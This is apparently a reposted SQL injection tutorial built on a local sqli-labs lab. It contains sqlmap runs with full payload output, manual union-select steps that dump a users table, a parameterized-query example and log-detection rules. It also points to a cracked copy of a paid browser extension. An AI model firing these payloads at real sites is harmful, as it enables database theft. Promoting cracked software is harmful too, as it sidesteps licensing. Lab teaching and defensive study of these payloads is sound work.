| 14 | 1 | 湖南 | 1 | 岳阳 |
| 14 | 1 | 湖南 | 1 | 株洲 |
+----+-----+------+------+--------+
[09:50:01] [INFO] table 'demo1125.v_p_c' dumped to CSV file 'xxxx\sqlmap\output\127.0.0.1\dump\demo1125\v_p_c.csv'
[09:50:01] [INFO] fetched data logged to text files under 'xxxx\sqlmap\output\127.0.0.1'
[*] ending @ 09:50:01 /2020-03-02/
9. sqlmap: brute-forcing names
Brute-forcing table names
Parameter:
--common-tables
In some cases --tables cannot list the tables in a database, for example:
- MySQL versions below 5.0 have no information_schema
- The database user's privileges are too low to read table names
In such cases the names have to be brute-forced.
Test:
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 --common-tables
Output:
___
__H__
___ ___[']_____ ___ ___ {1.4.2.31#dev}
|_ -| . [(] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 09:57:11 /2020-03-02/
[09:57:11] [INFO] resuming back-end DBMS 'mysql'
[09:57:11] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 2962=2962 AND 'UWCI'='UWCI
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 3197 FROM(SELECT COUNT(*),CONCAT(0x7178716a71,(SELECT (ELT(3197=3197,1))),0x71786a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'OKvt'='OKvt
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 7043 FROM (SELECT(SLEEP(5)))bunr) AND 'kqMl'='kqMl
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-5250' UNION ALL SELECT NULL,NULL,CONCAT(0x7178716a71,0x5953556e50546e68664e6b69504356704b4b764a704759624e794e4c5a71584c56624547576b5a66,0x71786a7071)-- -
---
[09:57:11] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0
[09:57:11] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
which common tables (wordlist) file do you want to use?
[1] default 'xxxxx\sqlmapproject-sqlmap-0605f14\data\txt\common-tables.txt' (press Enter)
[2] custom
>
[09:57:14] [INFO] performing table existence using items from 'xxxxx\sqlmapproject-sqlmap-0605f14\data\txt\common-tables.txt'
[09:57:14] [INFO] adding words used on web page to the check list
please enter number of threads? [Enter for 1 (current)] 5
[09:57:17] [INFO] starting 5 threads
[09:57:17] [INFO] retrieved: users
Current database
[1 table]
+-------+
| users |
+-------+
[09:59:04] [INFO] fetched data logged to text files under 'xxxx\sqlmap\output\127.0.0.1'
[*] ending @ 09:59:05 /2020-03-02/
One table, users, was found in the current database; this is probably because, of its tables, only users is contained in sqlmap's bundled common-tables wordlist.
Brute-forcing column names
Parameter:
--common-columns
Test:
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 -D demo1125 -T student --common-columns
Output:
___
__H__
___ ___[']_____ ___ ___ {1.4.2.31#dev}
|_ -| . [)] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 13:22:16 /2020-03-02/
[13:22:17] [INFO] resuming back-end DBMS 'mysql'
[13:22:17] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 2962=2962 AND 'UWCI'='UWCI
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 3197 FROM(SELECT COUNT(*),CONCAT(0x7178716a71,(SELECT (ELT(3197=3197,1))),0x71786a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'OKvt'='OKvt
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 7043 FROM (SELECT(SLEEP(5)))bunr) AND 'kqMl'='kqMl
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-5250' UNION ALL SELECT NULL,NULL,CONCAT(0x7178716a71,0x5953556e50546e68664e6b69504356704b4b764a704759624e794e4c5a71584c56624547576b5a66,0x71786a7071)-- -
---
[13:22:17] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0
[13:22:17] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
which common columns (wordlist) file do you want to use?
[1] default 'xxxxx\sqlmapproject-sqlmap-0605f14\data\txt\common-columns.txt' (press Enter)
[2] custom
>
[13:22:18] [INFO] checking column existence using items from 'xxxxx\sqlmapproject-sqlmap-0605f14\data\txt\common-columns.txt'
[13:22:18] [INFO] adding words used on web page to the check list
please enter number of threads? [Enter for 1 (current)] 10
[13:22:23] [INFO] starting 10 threads
[13:22:24] [INFO] retrieved: sid
[13:22:29] [INFO] retrieved: sname
[13:22:31] [INFO] retrieved: gid
Database: demo1125
Table: student
[3 columns]
+--------+-------------+
| Column | Type |
+--------+-------------+
| gid | numeric |
| sid | numeric |
| sname | non-numeric |
+--------+-------------+
[13:23:24] [INFO] fetched data logged to text files under 'xxxx\sqlmap\output\127.0.0.1'
[*] ending @ 13:23:24 /2020-03-02/
10. sqlmap: retrieving everything
Parameter:
-a
or --all
Returns all the information sqlmap can retrieve.
Test:
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 -a --threads 10 --batch
Output:
(screenshot of the sqlmap --all run, not reproduced here)
Obviously this process takes a long time, wastes resources and is easily noticed by the other side, so do not use it lightly.
You can practise on an online lab range:
https://www.mozhe.cn/bug/d1hJazFDeGRHV05DVjI3YXpHREZGUT09bW96aGUmozhe
III. Principles of SQL injection
1. Introduction to SQL injection
SQL injection means that a web application does not check the validity of user input: the parameters passed from the front end to the back end are attacker-controllable and are carried into a database query, so the attacker can craft different SQL statements to perform arbitrary operations on the database.
Two conditions must both hold for a SQL injection vulnerability to arise:
- The parameter is user-controllable
- The parameter is carried into a database query: the submitted value is concatenated into the SQL statement and sent to the database, i.e. there is interaction with the database
2. Impact of SQL injection
- Leakage of sensitive data from the database
- Web pages tampered with
- Malicious operations on the database
- Remote control of the server
So during development, validation must be done on both the front end and the back end to ensure security.
3. Classification of SQL injection
By the data type at the injection point
- String type
- Numeric type
(1) String injection test:
Tested against the security database:
Normal case:
select * from users where username = '' and password = '';
Output
Empty set (0.01 sec)
That is, when the query conditions are empty no rows are found.
After string injection:
select * from users where username = '' or 1 = 1; -- ' and password = '';
Output
+----+----------+------------+
| id | username | password |
+----+----------+------------+
| 1 | Dumb | Dumb |
| 2 | Angelina | I-kill-you |
| 3 | Dummy | p@ssword |
| 4 | secure | crappy |
| 5 | stupid | stupidity |
| 6 | superman | genious |
| 7 | batman | mob!le |
| 8 | admin | admin |
| 9 | admin1 | admin1 |
| 10 | admin2 | admin2 |
| 11 | admin3 | admin3 |
| 12 | dhakkan | dumbo |
| 13 | admin4 | admin4 |
| 14 | admin5 | admin5 |
+----+----------+------------+
14 rows in set (0.00 sec)
Now every row of the users table is returned.
The principle:
The injected single quote closes the opening quote; the appended or, together with an always-true boolean expression, makes the WHERE condition always true; and the trailing -- comments out the rest of the statement. The SQL statement is therefore equivalent to:
select * from users where true;
(2) Numeric injection test:
Normal case:
select * from users where id = 1;
Output
+----+----------+----------+
| id | username | password |
+----+----------+----------+
| 1 | Dumb | Dumb |
+----+----------+----------+
1 row in set (0.01 sec)
After numeric injection:
select * from users where id =-1 or 1 = 1;
Output
+----+----------+------------+
| id | username | password |
+----+----------+------------+
| 1 | Dumb | Dumb |
| 2 | Angelina | I-kill-you |
| 3 | Dummy | p@ssword |
| 4 | secure | crappy |
| 5 | stupid | stupidity |
| 6 | superman | genious |
| 7 | batman | mob!le |
| 8 | admin | admin |
| 9 | admin1 | admin1 |
| 10 | admin2 | admin2 |
| 11 | admin3 | admin3 |
| 12 | dhakkan | dumbo |
| 13 | admin4 | admin4 |
| 14 | admin5 | admin5 |
+----+----------+------------+
14 rows in set (0.00 sec)
That is, the original id is made negative so it matches nothing, and the appended or clause makes the condition always true.
By the returned result
- Error-based injection (error-based)
- Blind injection (boolean/time-based blind)
4. Why SQL injection arises
- Data and code are not strictly separated
- User-submitted parameter data is not sufficiently checked and filtered before being carried into the SQL command, which changes the semantics of the original SQL command, and the altered command is then executed by the database
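Both injections above work only because the input is pasted into the query text. As an added example that is not part of the original post, the following Python reproduces the string-type and numeric-type cases against an in-memory SQLite copy of the users table printed above (rows constructed from that table; SQLite stands in for MySQL) and shows the parameterized form that keeps data separate from code; the function names are invented for illustration.

```python
import sqlite3

# The 14 rows of the sqli-labs security.users table printed above, loaded into an
# in-memory SQLite database (constructed test data; SQLite stands in for MySQL here).
USERS = [
    (1, "Dumb", "Dumb"), (2, "Angelina", "I-kill-you"), (3, "Dummy", "p@ssword"),
    (4, "secure", "crappy"), (5, "stupid", "stupidity"), (6, "superman", "genious"),
    (7, "batman", "mob!le"), (8, "admin", "admin"), (9, "admin1", "admin1"),
    (10, "admin2", "admin2"), (11, "admin3", "admin3"), (12, "dhakkan", "dumbo"),
    (13, "admin4", "admin4"), (14, "admin5", "admin5"),
]

def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", USERS)
    return conn

# --- string-type injection point: the input is pasted between the query's quotes ---
def login_vulnerable(conn, username, password):
    # Data and code are not separated: a quote in the input becomes SQL syntax, so the
    # username "' or 1 = 1; -- " turns the WHERE clause into "username = '' or 1 = 1"
    # and the trailing comment swallows the password check.
    sql = f"select * from users where username = '{username}' and password = '{password}'"
    return conn.execute(sql).fetchall()

def login_parameterized(conn, username, password):
    # Placeholders bind the input as data; the database never parses it as SQL.
    sql = "select * from users where username = ? and password = ?"
    return conn.execute(sql, (username, password)).fetchall()

# --- numeric injection point: no quotes at all, so "-1 or 1 = 1" needs no quote to break out ---
def by_id_vulnerable(conn, user_id):
    sql = f"select * from users where id = {user_id}"
    return conn.execute(sql).fetchall()

def by_id_hardened(conn, user_id):
    # Validate the type first (an id must be an integer), then bind it as a parameter.
    try:
        value = int(user_id)
    except (TypeError, ValueError):
        raise ValueError(f"id must be an integer, got {user_id!r}") from None
    return conn.execute("select * from users where id = ?", (value,)).fetchall()

if __name__ == "__main__":
    db = make_db()
    print(len(login_vulnerable(db, "' or 1 = 1; -- ", "")), "rows from the vulnerable login")        # 14
    print(len(login_parameterized(db, "' or 1 = 1; -- ", "")), "rows from the parameterized login")  # 0
    print(len(by_id_vulnerable(db, "-1 or 1 = 1")), "rows from the vulnerable id lookup")            # 14
```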
5. SQL injection process
IV. Installing the HackBar browser extension
1. Installing HackBar in Google Chrome
Because the new version of HackBar has become a paid extension, installing it directly is inconvenient, so a cracked version is used; and since installing Google extensions normally requires getting around the network restrictions, which is inconvenient for beginners, installing the cracked extension from a file is the more convenient route.
Both the original English version https://download.csdn.net/download/CUFEECR/12209736 and the Chinese-localized version https://download.csdn.net/download/CUFEECR/12209697 of the HackBar extension are provided here; click to download, unzip, then install.
The installation steps are illustrated below:
2. Installing HackBar in Firefox
The new version of HackBar for Firefox is also paid; there are two ways around this:
Use an older version of HackBar
It can be downloaded from https://download.csdn.net/download/CUFEECR/12209830.
After unzipping, the installation steps are:
- Open Firefox's Add-ons page and click Install Add-on From File;
- Open the {4c98c9c7-fc13-4622-b08a-a18923469c1c}.xpi file to add the extension;
- Turn off automatic updates for HackBar:
Find the HackBar extension, click the menu in the top-right corner, then click Options; the Allow Automatic Updates setting appears, set it to Off.
Note:
Be sure to turn off the extension's automatic updates, otherwise the browser will automatically update it to the paid version!!!
After installation, HackBar looks like this:
Use a similar extension in place of HackBar
Searching for hackbar in the Firefox add-ons store https://addons.mozilla.org/zh-CN/firefox/search/?platform=windows&q=HackBar turns up many similar extensions whose functionality is essentially the same.
You can pick one of them as a replacement, such as Max HackBar.
V. SQL injection
1. GET and POST requests
- GET submission:
The request data is appended to the URL (that is, the data is placed in the HTTP header); ? generally separates the URL from the transmitted data, and multiple parameters are joined with &.
- POST submission:
The submitted data is placed in the body of the HTTP packet.
Data submitted with GET is shown in the address bar, while with POST the address bar does not change, so in this respect POST requests are safer than GET requests.
2. Error-based SQL injection via GET
Finding the injection point
Change the id value in the URL to a normal number, to characters (single quote, double quote, parenthesis) or to a backslash, to probe whether the URL has an injection point.
Visiting http://127.0.0.1/sqli-labs/Less-1/?id=1' shows:
An error message:
''1'' LIMIT 0,1'
From it the SQL query can be inferred to be:
select * from xxx where id = '1'' limit 0,1;
Visiting http://127.0.0.1/sqli-labs/Less-2/?id=1' shows:
An error message:
'' LIMIT 0,1'
From it the SQL query can be inferred to be:
select * from xxx where id = "1" limit 0,1;
Visiting http://127.0.0.1/sqli-labs/Less-3/?id=1' shows:
An error message:
''1'') LIMIT 0,1'
From it the SQL query can be inferred to be:
select * from xxx where id = ('1') limit 0,1;
Visiting http://127.0.0.1/sqli-labs/Less-4/?id=1" shows:
An error message:
'"1"") LIMIT 0,1'
From it the SQL query can be inferred to be:
select * from xxx where id = ("1") limit 0,1;
Exploiting error-based SQL injection via GET
(1) Determine the number of columns with order by
Visiting http://127.0.0.1/sqli-labs/Less-1/?id=1' order by 1 --+ shows
The page loads normally, and it does for 2 and 3 as well.
Visiting http://127.0.0.1/sqli-labs/Less-1/?id=1' order by 4 --+ shows
Now the page no longer loads normally, so the number of columns is 3.
Note:
--+ acts as a comment in the database and comments out the rest of the statement.
(2) Get table names with a union select query
Visiting http://127.0.0.1/sqli-labs/Less-1/?id=0' union select 1,2,3 --+ shows:
Since 3 columns were detected, the union select must also have 3 columns, otherwise an error occurs.
Visiting http://127.0.0.1/sqli-labs/Less-1/?id=0' union select 1,user(),database() --+ shows:
This plainly exposes the database security.
Visiting http://127.0.0.1/sqli-labs/Less-1/?id=0' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+ shows:
This yields the table names in the database.
(3) Get column names with a union select query
Visiting http://127.0.0.1/sqli-labs/Less-1/?id=0' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' --+ shows:
This gives all columns of the named table. There may be more than the target table has, because other databases may also contain a users table, and their columns are included too.
(4) Get column values with a union select query
Visiting http://127.0.0.1/sqli-labs/Less-1/?id=0' union select 1,group_concat(username,password),3 from users --+ shows:
This yields all the data in the named table.
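Section 10 notes that sqlmap runs are easily noticed by the other side, and the manual probes in this section (bare quote, order by, union select on information_schema) leave equally recognisable traces in a web server's access log. As an added example (not from the original post), the following Python runs a few signature rules over constructed access-log lines modelled on the payloads shown on this page; the log lines, IP addresses and rule names are invented for illustration, and the rules are a simple heuristic, not sqlmap's own logic.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed access-log lines in Apache/nginx "combined" format (not real server logs).
# Lines 1-2 mimic sqlmap's boolean-blind and UNION payloads from the runs above, lines 3-5
# mimic the manual probes from this section, line 6 is an ordinary request.
SAMPLE_LOG = """\
127.0.0.1 - - [02/Mar/2020:09:16:36 +0800] "GET /sqli-labs/Less-1/?id=1%27%20AND%202962%3D2962%20AND%20%27UWCI%27%3D%27UWCI HTTP/1.1" 200 1523 "-" "sqlmap/1.4.2.31#dev (http://sqlmap.org)"
127.0.0.1 - - [02/Mar/2020:09:16:36 +0800] "GET /sqli-labs/Less-1/?id=-5250%27%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(0x7178716a71,0x59,0x71786a7071)--%20- HTTP/1.1" 200 1601 "-" "sqlmap/1.4.2.31#dev (http://sqlmap.org)"
192.0.2.10 - - [02/Mar/2020:10:01:02 +0800] "GET /sqli-labs/Less-1/?id=1%27 HTTP/1.1" 200 1190 "-" "Mozilla/5.0 (Windows NT 10.0) Firefox/73.0"
192.0.2.10 - - [02/Mar/2020:10:01:09 +0800] "GET /sqli-labs/Less-1/?id=1%27%20order%20by%204%20--+ HTTP/1.1" 200 1190 "-" "Mozilla/5.0 (Windows NT 10.0) Firefox/73.0"
192.0.2.10 - - [02/Mar/2020:10:01:31 +0800] "GET /sqli-labs/Less-1/?id=0%27%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=database()%20--+ HTTP/1.1" 200 1342 "-" "Mozilla/5.0 (Windows NT 10.0) Firefox/73.0"
198.51.100.7 - - [02/Mar/2020:10:05:00 +0800] "GET /sqli-labs/Less-1/?id=1 HTTP/1.1" 200 1523 "-" "Mozilla/5.0 (Windows NT 10.0) Firefox/73.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Rule applied to the User-Agent header: sqlmap announces itself unless the operator overrides it.
UA_RULES = {"sqlmap-user-agent": re.compile(r"^sqlmap/", re.I)}
# Rules applied to the URL-decoded query string; each corresponds to a technique shown on this page.
QUERY_RULES = {
    "bare-quote-probe": re.compile(r"=-?\d+['\")]"),                       # id=1'  id=1"  id=1)
    "order-by-column-count": re.compile(r"\border\s+by\s+\d+", re.I),      # order by 4
    "union-select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "information-schema": re.compile(r"\binformation_schema\b", re.I),
    "tautology": re.compile(r"\b(?:and|or)\s+(\d+)\s*=\s*\1\b", re.I),     # AND 2962=2962, or 1=1
    "time-based": re.compile(r"\bsleep\s*\(", re.I),                       # SLEEP(5)
    "error-based-floor-rand": re.compile(r"\bfloor\s*\(\s*rand\s*\(", re.I),
}

def parse_line(line):
    """Split one combined-format line into fields and URL-decode the query string."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    path, _, query = entry["path"].partition("?")
    entry["path"] = path
    entry["query"] = unquote_plus(query)  # %27 -> ' and --+ -> "-- ", as the database sees it
    return entry

def classify(entry):
    """Names of all rules that fire on one parsed entry (empty list for a clean request)."""
    hits = [name for name, rx in UA_RULES.items() if rx.search(entry["ua"])]
    hits += [name for name, rx in QUERY_RULES.items() if rx.search(entry["query"])]
    return hits

def analyze(log_text):
    """One finding per suspicious line: source IP, timestamp, decoded query and rule names."""
    findings = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        hits = classify(entry)
        if hits:
            findings.append({"ip": entry["ip"], "time": entry["time"],
                             "query": entry["query"], "rules": hits})
    return findings

def per_ip_counts(findings):
    """Suspicious requests per source IP; a high count is the signature of automated enumeration."""
    return Counter(f["ip"] for f in findings)

if __name__ == "__main__":
    found = analyze(SAMPLE_LOG)
    for f in found:
        print(f"{f['ip']:<13} {', '.join(f['rules'])}: {f['query']}")
    print("suspicious requests per IP:", dict(per_ip_counts(found)))
```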
Reposted from: https://blog.csdn.net/CUFEECR/article/details/104637404